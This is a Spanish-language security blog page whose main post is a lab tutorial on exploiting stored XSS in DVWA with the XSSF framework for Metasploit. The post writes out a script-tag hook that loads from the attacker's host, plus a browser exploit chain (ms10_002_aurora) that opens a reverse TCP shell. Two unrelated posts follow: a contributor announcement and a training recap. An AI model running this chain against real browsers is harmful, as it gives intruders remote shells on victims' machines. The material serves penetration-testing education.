miércoles, 16 de febrero de 2011

Explotando XSS con Metasploit

En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.

XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una  descripción más detallada del framework aquí.


Jugando con XSSF

Para realizar estas pruebas vamos a utilizar el DVWA, un framework para testing de vulnerabilidades web, instalado sobre una VM  Windows XP y nuestro Backtrack 4 R2.

Lo primero que vamos a hacer es descargar el XSSF framework desde aquí y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:

# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../

# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF


Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:

<script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>


Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.

Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)

Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":


Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":


Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:

use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"

 

También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:

use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/

Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:

jobs
xssf_active_victims
xssf_exploit victimID jobID


Espero que les haya gustado mi primer post! :)

Referencias:
- http://www.metasploit.com/redmine/issues/2995
- http://www.dvwa.co.uk/


Publicado por Lucas Duarte Wulfert en www.KUNGFOOSION.com

martes, 8 de febrero de 2011

Nuevo Colaborador del Blog!

Tengo el verdadero placer de sumar al Ing. Lucas Duarte Wulfert, también conocido como p4dawan, como nuevo colaborador de este blog!


Desde hace algunos meses, Lucas trabaja como Security Consultant en el área de Servicios Profesionales de BASE4 Security. Quienes siguen este blog seguramente lo habrán visto en alguna foto como co-instructor del COMBAT Training.

Dentro de sus actividades diarias, Lucas realiza testings de Ethical Hacking y Penetration Testing, y actualmente se encuentra activamente investigando y actualizando el contenido de los trainings.

Lucas se encuentra cursando el Master de Seguridad Informática en la Universidad de Buenos Aires.

Sin ninguna duda, el amigo Lucas va a realizar interesantes aportes para los lectores de KUNGFOOSION.COM :-)

Twitter de Lucas: @p4dawan
 

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 7 de febrero de 2011

Ninjas de "La Mitad del Mundo"

La semana pasada el COMBAT Training paso por Quito - Ecuador, también conocida como "La Mitad del Mundo"!

Fue un verdadero orgullo y honor haber tenido la oportunidad de dictar un training a la Fiscalía General del Estado de Ecuador, quienes constantemente se capacitan con la misión de combatir los delitos informáticos.

Hace pocos meses, cuando dictamos el COMBAT Training en Guayaquil me sorprendió el buen humor de los ecuatorianos, y lo termine de confirmar en Quito, con una semana que dejo muchísimas anécdotas e historias ;)

Los ganadores del CTF de esta edición fueron, Gabriel Cuestas, Carolina Salas y Luis Pavón. Felicitaciones!


Sin ninguna duda fue una de las finales mas peleadas que recuerdo… en un momento parecía que "EL PAPI" se llevaba la katana a su casa, pero a ultimo momento "EL GABO" tomo la delantera y lo gano, seguido por "TOTO" con una diferencia mínima. Mención especial se merece Pedro Ponce, también conocido como piter.php, que dio una gran batalla contra su archienemigo "EL PAPI" :P

Como era la primera vez que estaba en una fiscalía, no podía dejar pasar la oportunidad de cumplir mi sueño de ser JUEZ! Me vi tentado a dictar el training desde allí, pero no me dejaron… :D


Espero tener la oportunidad de próximamente volver a Ecuador, donde me encontré con un grupo de personas excelente!


Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

LinkWithin